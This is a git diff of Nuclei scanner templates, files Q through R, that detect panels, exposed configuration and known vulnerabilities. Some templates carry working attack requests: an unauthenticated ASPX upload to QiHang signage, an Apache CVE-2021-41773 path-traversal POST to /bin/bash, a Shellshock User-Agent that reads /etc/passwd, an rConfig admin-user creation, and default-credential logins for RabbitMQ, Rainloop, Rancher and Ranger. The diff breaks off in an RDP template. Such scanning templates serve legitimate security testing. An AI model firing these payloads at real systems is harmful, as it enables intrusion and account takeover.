b2280afbb6..0000000000 --- a/nuclei-templates/Other/qihang-media-upload_all.yaml +++ /dev/null @@ -1,66 +0,0 @@ -id: qihang-media-unauth-upload - -info: - name: QiHang Media Web Digital Signage 3.0.9 - unauth upload - author: vitasoy - severity: critical - description: | - body="/images/qihang.ico" && region="Guangdong" - --dork-zoomeye subdivisions:"广东" +qihang.ico - QiHang Media Web Digital Signage 3.0.9 suffers from a clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - tags: qihang_all,upload,unauth,intrusive - -variables: - a1: "{{rand_base(6)}}" - a2: "{{randstr}}" -http: - - raw: - - | - POST /QH.aspx HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr - Content-Length: 1830 - - ------WebKitFormBoundaryhbcZX7o0Hw19h3kr - Content-Disposition: form-data; name="fileToUpload"; filename="{{a1}}.aspx" - Content-Type: application/octet-stream - - <% response.write ("{{a2}}")%> - ------WebKitFormBoundaryhbcZX7o0Hw19h3kr - Content-Disposition: form-data; name="action" - - upload - ------WebKitFormBoundaryhbcZX7o0Hw19h3kr - Content-Disposition: form-data; name="responderId" - - ResourceNewResponder - ------WebKitFormBoundaryhbcZX7o0Hw19h3kr - Content-Disposition: form-data; name="remotePath" - - /opt/resources - ------WebKitFormBoundaryhbcZX7o0Hw19h3kr-- - - | - GET /opt/resources/{{a1}}.aspx HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 - - matchers: - - type: word - words: - - "{{a2}}" - part: body - -# digest: 4a0a00473045022100b0ccc2410095cc0b8643fecc56332837abe16e738090fb425ade88ff74dc8ee202202fb2a4c5e13026904c35c4e5b1714a655b8b1d0a2836099f26d0923adcbac7cc:922c64590222798bb761d5b6d8e72950 -# \ No newline at end of file diff --git a/nuclei-templates/Other/qnap-qts-panel-9770.yaml b/nuclei-templates/Other/qnap-qts-panel-9770.yaml deleted file mode 100644 index ed97040cbf..0000000000 --- a/nuclei-templates/Other/qnap-qts-panel-9770.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: qnap-qts-panel - -info: - name: QNAP Turbo NAS Login Panel - Detect - author: idealphase,daffainfo - severity: info - description: | - QNAP QTS login panel was detected. - reference: - - https://www.qnap.com/qts/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:* - metadata: - google-query: intitle:"QNAP Turbo NAS" inurl:/cgi-bin - max-request: 2 - product: qts - shodan-query: product:"QNAP" - vendor: qnap - verified: true - tags: panel,qnap,qts - -http: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/" - - "{{BaseURL}}/cgi-bin/html/login.html" - - stop-at-first-match: true - redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "QNAP Turbo NAS" - - - type: status - status: - - 200 -# digest: 4a0a00473045022075fc5f317682d5292041379c454431b24e86b6d2200816db375f6ebb656f39df022100cf55ec6c064f81b67143fdfbb49a393900f22378a4bb2a8c4e6405299689dcea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/qnap-qts-panel.yaml b/nuclei-templates/Other/qnap-qts-panel.yaml new file mode 100644 index 0000000000..b549de8bff --- /dev/null +++ b/nuclei-templates/Other/qnap-qts-panel.yaml @@ -0,0 +1,32 @@ +id: qnap-qts-panel +info: + name: QNAP - QTS Panel Discovery + author: idealphase + severity: info + description: | + QNAP QTS Panel was discovered. + reference: + - https://www.qnap.com/en?ref=header_logo + metadata: + verified: true + shodan-query: product:"QNAP" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,qnap,qts +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "QNAP Turbo NAS" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/27 diff --git a/nuclei-templates/Other/2378487680.yaml b/nuclei-templates/Other/quasar.yaml similarity index 100% rename from nuclei-templates/Other/2378487680.yaml rename to nuclei-templates/Other/quasar.yaml diff --git a/nuclei-templates/Other/qvisdvr-deserialization-rce-9775.yaml b/nuclei-templates/Other/qvisdvr-deserialization-rce.yaml similarity index 100% rename from nuclei-templates/Other/qvisdvr-deserialization-rce-9775.yaml rename to nuclei-templates/Other/qvisdvr-deserialization-rce.yaml diff --git a/nuclei-templates/Other/rabbitmq-dashboard-9778.yaml b/nuclei-templates/Other/rabbitmq-dashboard-9778.yaml deleted file mode 100644 index e881972648..0000000000 --- a/nuclei-templates/Other/rabbitmq-dashboard-9778.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: rabbitmq-dashboard -info: - name: RabbitMQ Dashboard - author: fyoorer - severity: info -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - "RabbitMQ Management" - part: body diff --git a/nuclei-templates/Other/rabbitmq-dashboard-9779.yaml b/nuclei-templates/Other/rabbitmq-dashboard-9779.yaml new file mode 100644 index 0000000000..732f59a4f4 --- /dev/null +++ b/nuclei-templates/Other/rabbitmq-dashboard-9779.yaml @@ -0,0 +1,17 @@ +id: rabbitmq-dashboard + +info: + name: RabbitMQ Dashboard + author: fyoorer + severity: info + tags: panel,rabbitmq + +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "RabbitMQ Management" + part: body diff --git a/nuclei-templates/Other/rabbitmq-default-admin-9780.yaml b/nuclei-templates/Other/rabbitmq-default-admin-9780.yaml new file mode 100644 index 0000000000..bd88748778 --- /dev/null +++ b/nuclei-templates/Other/rabbitmq-default-admin-9780.yaml @@ -0,0 +1,25 @@ +id: rabbitmq-default-admin +info: + name: RabbitMQ Default Credentials + author: fyoorer & dwisiswant0 + severity: high + tags: rabbitmq,default-login +requests: + - method: GET + path: + - "{{BaseURL}}/api/whoami" + headers: + Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q=" + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + - type: word + words: + - "{\"name\":\"guest\"" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/rabbitmq-default-admin-9782.yaml b/nuclei-templates/Other/rabbitmq-default-admin-9782.yaml deleted file mode 100644 index d161a5236d..0000000000 --- a/nuclei-templates/Other/rabbitmq-default-admin-9782.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: rabbitmq-default-admin -info: - name: RabbitMQ Default Credentials - author: fyoorer & dwisiswant0 - severity: High -requests: - - method: GET - path: - - "{{BaseURL}}/api/whoami" - - "{{BaseURL}}:15672/api/whoami" - headers: - Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q=" - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - - type: word - words: - - "{\"name\":\"guest\"" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/rabbitmq-default-login-9786.yaml b/nuclei-templates/Other/rabbitmq-default-login.yaml similarity index 100% rename from nuclei-templates/Other/rabbitmq-default-login-9786.yaml rename to nuclei-templates/Other/rabbitmq-default-login.yaml diff --git a/nuclei-templates/Other/race-simple.yaml b/nuclei-templates/Other/race-simple.yaml index 39a7fb9136..89d4db9d37 100644 --- a/nuclei-templates/Other/race-simple.yaml +++ b/nuclei-templates/Other/race-simple.yaml @@ -1,23 +1,46 @@ id: race-condition-testing info: - name: Race Condition testing + name: Race condition testing with multiple requests author: pdteam severity: info requests: - - raw: + - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - test + id=1 + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + id=2 + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + id=3 + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + id=4 + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + id=5 + + threads: 5 race: true - race_count: 10 matchers: - type: status - part: header status: - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/rack-mini-profiler-9791.yaml b/nuclei-templates/Other/rack-mini-profiler-9791.yaml deleted file mode 100644 index 5a123b13b3..0000000000 --- a/nuclei-templates/Other/rack-mini-profiler-9791.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: rack-mini-profiler -info: - name: rack-mini-profiler environmnet information discloure - author: vzamanillo - severity: high -requests: - - method: GET - path: - - "{{BaseURL}}/?pp=env" - matchers-condition: and - matchers: - - type: word - words: - - "Rack Environment" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/rack-mini-profiler-9793.yaml b/nuclei-templates/Other/rack-mini-profiler-9793.yaml new file mode 100644 index 0000000000..c6743ef9a6 --- /dev/null +++ b/nuclei-templates/Other/rack-mini-profiler-9793.yaml @@ -0,0 +1,21 @@ +id: rack-mini-profiler + +info: + name: rack-mini-profiler environment information disclosure + author: vzamanillo + severity: high + tags: config,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/?pp=env" + + matchers-condition: and + matchers: + - type: word + words: + - "Rack Environment" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/radius-manager-9796.yaml b/nuclei-templates/Other/radius-manager-9796.yaml new file mode 100644 index 0000000000..48bf6ea4e3 --- /dev/null +++ b/nuclei-templates/Other/radius-manager-9796.yaml @@ -0,0 +1,25 @@ +id: radius-manager-login + +info: + name: Radius Manager Control Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6790 + tags: panel,radius + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/admin.php' + - '{{BaseURL}}/radiusmanager/user.php' + - '{{BaseURL}}/user.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Radius Manager - User Control Panel' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/radius-manager.yaml b/nuclei-templates/Other/radius-manager.yaml deleted file mode 100644 index b7f0b79250..0000000000 --- a/nuclei-templates/Other/radius-manager.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: radius-manager-login -info: - name: Radius Manager Control Panel - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6790 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/admin.php' - - '{{BaseURL}}/radiusmanager/user.php' - - '{{BaseURL}}/user.php' - matchers-condition: and - matchers: - - type: word - words: - - 'Radius Manager - User Control Panel' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/rails-database-config-9803.yaml b/nuclei-templates/Other/rails-database-config-9803.yaml new file mode 100644 index 0000000000..7625581be6 --- /dev/null +++ b/nuclei-templates/Other/rails-database-config-9803.yaml @@ -0,0 +1,22 @@ +id: rails-database-config +info: + name: Ruby-on-Rails Database Configuration Exposure + author: pdteam,geeknik + severity: low + tags: config,exposure,rails +requests: + - method: GET + path: + - "{{BaseURL}}/config/database.yml" + matchers-condition: and + matchers: + - type: word + words: + - "adapter:" + - "database:" + - "production:" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/rails-database-config-9804.yaml b/nuclei-templates/Other/rails-database-config-9804.yaml deleted file mode 100644 index 6e5b4f8f2b..0000000000 --- a/nuclei-templates/Other/rails-database-config-9804.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: rails-database-config - -info: - name: Ruby-on-Rails Database Configuration Exposure - author: pdteam,geeknik - severity: low - tags: config,exposure,rails - -requests: - - method: GET - path: - - "{{BaseURL}}/config/database.yml" - - matchers-condition: and - matchers: - - type: word - words: - - "adapter:" - - "database:" - - "production:" - condition: and - part: body - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/rails-secret-token-disclosure.yaml b/nuclei-templates/Other/rails-secret-token-disclosure.yaml index 8505b6ebc5..387218b6c6 100644 --- a/nuclei-templates/Other/rails-secret-token-disclosure.yaml +++ b/nuclei-templates/Other/rails-secret-token-disclosure.yaml @@ -3,8 +3,7 @@ info: name: Ruby on Rails Secret Token Disclosure author: dhiyaneshDk severity: medium - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json tags: exposure,files,rails,ruby,token requests: - method: GET diff --git a/nuclei-templates/Other/rails6-xss.yaml b/nuclei-templates/Other/rails6-xss-9797.yaml similarity index 100% rename from nuclei-templates/Other/rails6-xss.yaml rename to nuclei-templates/Other/rails6-xss-9797.yaml diff --git a/nuclei-templates/Other/rainloop-default-login-9812.yaml b/nuclei-templates/Other/rainloop-default-login-9812.yaml new file mode 100644 index 0000000000..0068387dce --- /dev/null +++ b/nuclei-templates/Other/rainloop-default-login-9812.yaml @@ -0,0 +1,49 @@ +id: rainloop-default-login +info: + name: Rainloop WebMail - Default Admin Login + author: For3stCo1d + severity: high + description: Rainloop WebMail default admin login credentials were successful. + reference: + - https://github.com/RainLoop/rainloop-webmail/issues/28 + metadata: + verified: true + fofa-query: app="RAINLOOP-WebMail" + tags: default-login,rainloop,webmail,foss +requests: + - raw: + - | # Login Portal: /?admin + GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 + Host: {{Hostname}} + - | + POST /?/Ajax/&q[]=/0/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + attack: pitchfork + payloads: + user: + - admin + pass: + - 12345 + cookie-reuse: true + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - 'token":"(.+?)"' + matchers-condition: and + matchers: + - type: word + words: + - '"Action":"AdminLogin"' + - '"Result":true' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/Other/rainloop-default-login-9813.yaml b/nuclei-templates/Other/rainloop-default-login-9813.yaml deleted file mode 100644 index 48b5f927a4..0000000000 --- a/nuclei-templates/Other/rainloop-default-login-9813.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: rainloop-default-login - -info: - name: Rainloop WebMail - Default Admin Login - author: For3stCo1d - severity: high - description: Rainloop WebMail default admin login credentials were successful. - reference: - - https://github.com/RainLoop/rainloop-webmail/issues/28 - metadata: - verified: true - max-request: 2 - fofa-query: app="RAINLOOP-WebMail" - tags: default-login,rainloop,webmail,foss - -http: - - raw: - - | # Login Portal: /?admin - GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 - Host: {{Hostname}} - - | - POST /?/Ajax/&q[]=/0/ HTTP/2 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} - - attack: pitchfork - payloads: - user: - - admin - pass: - - 12345 - - extractors: - - type: regex - name: token - internal: true - group: 1 - regex: - - 'token":"(.+?)"' - - matchers-condition: and - matchers: - - type: word - words: - - '"Action":"AdminLogin"' - - '"Result":true' - condition: and - - - type: status - status: - - 200 - -# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/rancher-default-login-9815.yaml b/nuclei-templates/Other/rancher-default-login-9815.yaml new file mode 100644 index 0000000000..9eadc6d68c --- /dev/null +++ b/nuclei-templates/Other/rancher-default-login-9815.yaml @@ -0,0 +1,52 @@ +id: rancher-default-login + +info: + name: Rancher Default Login + author: princechaddha + severity: high + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher + tags: default-login,rancher,kubernetes,devops,cloud + +requests: + - raw: + - | + GET /v3/settings/first-login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 + + - | + POST /v3-public/localProviders/local?action=login HTTP/1.1 + Host: {{Hostname}} + Cookie: CSRF={{csrf}} + X-Api-Csrf: {{csrf}} + Connection: close + Content-Length: 136 + + {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'R_SESS=token' + part: header + + extractors: + - type: regex + name: csrf + group: 1 + internal: true + part: header + regex: + - 'Set-Cookie: CSRF=([a-z0-9]+)' diff --git a/nuclei-templates/Other/rancher-default-login.yaml b/nuclei-templates/Other/rancher-default-login.yaml deleted file mode 100644 index 5c29f0c69b..0000000000 --- a/nuclei-templates/Other/rancher-default-login.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: rancher-default-login -info: - name: Rancher Default Login - author: princechaddha - severity: high - description: Rancher default admin credentials were discovered. Rancher is an open-source multi-cluster orchestration platform that lets operations teams deploy, manage and secure enterprise Kubernetes. - reference: - - https://github.com/rancher/rancher - - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/ - tags: default-login,rancher,kubernetes,devops,cloud - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 -requests: - - raw: - - | - GET /v3/settings/first-login HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 - - | - POST /v3-public/localProviders/local?action=login HTTP/1.1 - Host: {{Hostname}} - Cookie: CSRF={{csrf}} - X-Api-Csrf: {{csrf}} - Connection: close - Content-Length: 136 - - {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'R_SESS=token' - part: header - extractors: - - type: regex - name: csrf - group: 1 - internal: true - part: header - regex: - - 'Set-Cookie: CSRF=([a-z0-9]+)' - -# Enhanced by mp on 2022/03/11 diff --git a/nuclei-templates/Other/rancher-panel-9817.yaml b/nuclei-templates/Other/rancher-panel-9817.yaml new file mode 100644 index 0000000000..18fba98578 --- /dev/null +++ b/nuclei-templates/Other/rancher-panel-9817.yaml @@ -0,0 +1,34 @@ +id: rancher-panel + +info: + name: Rancher Login Panel + author: princechaddha + severity: info + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher + tags: panel,rancher,kubernetes,devops,cloud,login + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Loading…" + - "global-admin/config/environment" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' diff --git a/nuclei-templates/Other/rancher-panel.yaml b/nuclei-templates/Other/rancher-panel.yaml deleted file mode 100644 index 578a9436ab..0000000000 --- a/nuclei-templates/Other/rancher-panel.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: rancher-panel -info: - name: Rancher Login Panel - author: princechaddha - severity: info - description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. - reference: https://github.com/rancher/rancher - tags: panel,rancher,kubernetes,devops,cloud,login -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Loading…" - - "global-admin/config/environment" - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '' diff --git a/nuclei-templates/Other/ranger-default-login-9827.yaml b/nuclei-templates/Other/ranger-default-login-9827.yaml new file mode 100644 index 0000000000..33536c3057 --- /dev/null +++ b/nuclei-templates/Other/ranger-default-login-9827.yaml @@ -0,0 +1,48 @@ +id: ranger-default-login + +info: + name: Apache Ranger - Default Login + author: For3stCo1d + severity: high + description: Apache Ranger contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/ranger + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 1 + shodan-query: http.title:"Ranger - Sign In" + tags: apache,ranger,default-login + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"statusCode":200' + - '"msgDesc":"Login Successful"' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402203bf53c048783b3bfa9ae3b589a837d7490de17871f806fdd517ec3f32b79d9b60220319afc2bd265b8457db14da8706c7852f329078070f5b51a82132229b4b31462:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/ranger-default-login.yaml b/nuclei-templates/Other/ranger-default-login.yaml deleted file mode 100644 index b7544ee7da..0000000000 --- a/nuclei-templates/Other/ranger-default-login.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: ranger-default-login - -info: - name: Apache Ranger Default Login - author: For3stCo1d - severity: high - reference: https://github.com/apache/ranger - metadata: - shodan-query: http.title:"Ranger - Sign In" - tags: apache,ranger,default-login - -requests: - - raw: - - | - POST /login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - username={{user}}&password={{pass}} - - attack: pitchfork - payloads: - user: - - admin - pass: - - admin - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"statusCode":200' - - '"msgDesc":"Login Successful"' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/rce-cve-2021-41773.yaml b/nuclei-templates/Other/rce-cve-2021-41773.yaml index d7798f2871..bf20e22be5 100644 --- a/nuclei-templates/Other/rce-cve-2021-41773.yaml +++ b/nuclei-templates/Other/rce-cve-2021-41773.yaml @@ -1,47 +1,18 @@ id: CVE-2021-41773 - info: - name: Apache 2.4.49 - Path Traversal and Remote Code Execution - author: daffainfo - severity: high - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://twitter.com/h4x0r_dz/status/1445401960371429381 - - https://github.com/blasty/CVE-2021-41773 - tags: cve,cve2021,lfi,rce,apache,misconfig,traversal - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-41773 - cwe-id: CWE-22 - metadata: - shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 + name: RCE in Apache HTTP Server 2.4.49 + author: RafaelCaria + severity: critical + tags: cve,cve2021,rce requests: - - raw: - - | - GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev + - method: POST + path: + - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + body: 'echo;id' - matchers-condition: or matchers: - - type: regex - name: LFI + part: body regex: - - "root:.*:0:0" - - - type: word - name: RCE - words: - - "CVE-2021-41773-POC" + - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" diff --git a/nuclei-templates/Other/rce-shellshock-user-agent-9832.yaml b/nuclei-templates/Other/rce-shellshock-user-agent-9832.yaml index eac5453998..03aef64b1d 100644 --- a/nuclei-templates/Other/rce-shellshock-user-agent-9832.yaml +++ b/nuclei-templates/Other/rce-shellshock-user-agent-9832.yaml @@ -1,17 +1,21 @@ id: rce-user-agent-shell-shock + info: name: Remote Code Execution Via (User-Agent) author: 0xelkomy severity: high tags: shellshock,rce + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/status" + headers: User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" + matchers: - type: regex regex: - "root:.*:0:0" - part: body + part: body \ No newline at end of file diff --git a/nuclei-templates/Other/rconfig-rce-9834.yaml b/nuclei-templates/Other/rconfig-rce-9834.yaml deleted file mode 100644 index 0d32e296d5..0000000000 --- a/nuclei-templates/Other/rconfig-rce-9834.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: rconfig-rce - -info: - name: rConfig 3.9.5 - Remote Code Execution - author: dwisiswant0 - severity: high - tags: rconfig,rce - description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint. - reference: - - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - - https://www.exploit-db.com/exploits/48878 - -requests: - - raw: - - | - POST /lib/crud/userprocess.php HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb - Cookie: PHPSESSID={{randstr}} - - --01b28e152ee044338224bf647275f8eb - Content-Disposition: form-data; name="username" - - {{randstr}} - --01b28e152ee044338224bf647275f8eb - Content-Disposition: form-data; name="passconf" - - Testing1@ - --01b28e152ee044338224bf647275f8eb - Content-Disposition: form-data; name="password" - - Testing1@ - --01b28e152ee044338224bf647275f8eb - Content-Disposition: form-data; name="email" - - test@{{randstr}}.tld - --01b28e152ee044338224bf647275f8eb - Content-Disposition: form-data; name="editid" - - - --01b28e152ee044338224bf647275f8eb - Content-Disposition: form-data; name="add" - - add - --01b28e152ee044338224bf647275f8eb - Content-Disposition: form-data; name="ulevelid" - - 9 - --01b28e152ee044338224bf647275f8eb-- - - matchers-condition: and - matchers: - - type: word - words: - - "User {{randstr}} successfully added to Database" - - part: body - - type: status - status: - - 302 diff --git a/nuclei-templates/Other/rconfig-rce.yaml b/nuclei-templates/Other/rconfig-rce.yaml new file mode 100644 index 0000000000..23f0e4bdf2 --- /dev/null +++ b/nuclei-templates/Other/rconfig-rce.yaml @@ -0,0 +1,61 @@ +id: rconfig-rce +info: + name: rConfig 3.9.5 - Remote Code Execution + author: dwisiswant0 + severity: high + tags: rconfig,rce + # This template supports the user creation part only. + # To triggering an RCE, see references[2]. + # References: + # - [1] https://www.rconfig.com/downloads/rconfig-3.9.5.zip + # - [2] https://www.exploit-db.com/exploits/48878 +requests: + - raw: + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + User-Agent: python-requests/2.23.0 + Connection: close + Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb + Upgrade-Insecure-Requests: 1 + Cookie: PHPSESSID=pdnuclei + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="username" + + pdnuclei + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="passconf" + + Testing1@ + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="password" + + Testing1@ + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="email" + + nuclei@projectdiscovery.io + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="editid" + + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="add" + + add + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="ulevelid" + + 9 + --01b28e152ee044338224bf647275f8eb-- + matchers-condition: and + matchers: + - type: word + words: + - "User pdnuclei successfully added to Database" + part: body + - type: status + status: + - 302 diff --git a/nuclei-templates/Other/rdp-detect-9840.yaml b/nuclei-templates/Other/rdp-detect-9840.yaml new file mode 100644 index 0000000000..ebe93db4f3 --- /dev/null +++ b/nuclei-templates/Other/rdp-detect-9840.yaml @@ -0,0 +1,67 @@ +id: rdp-detect +info: + name: Windows RDP Detection + author: princechaddha + severity: info + metadata: + verified: true + tags: network,windows,rdp +network: + - inputs: + - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" + type: hex + read-size: 2048 + host: + - "{{Host}}:3389" + - "{{Hostname}}" + matchers: + - type: word + name: rdp + encoding: hex + words: + - "030000130ed" + - type: word + encoding: hex + name: win2000 + words: + - 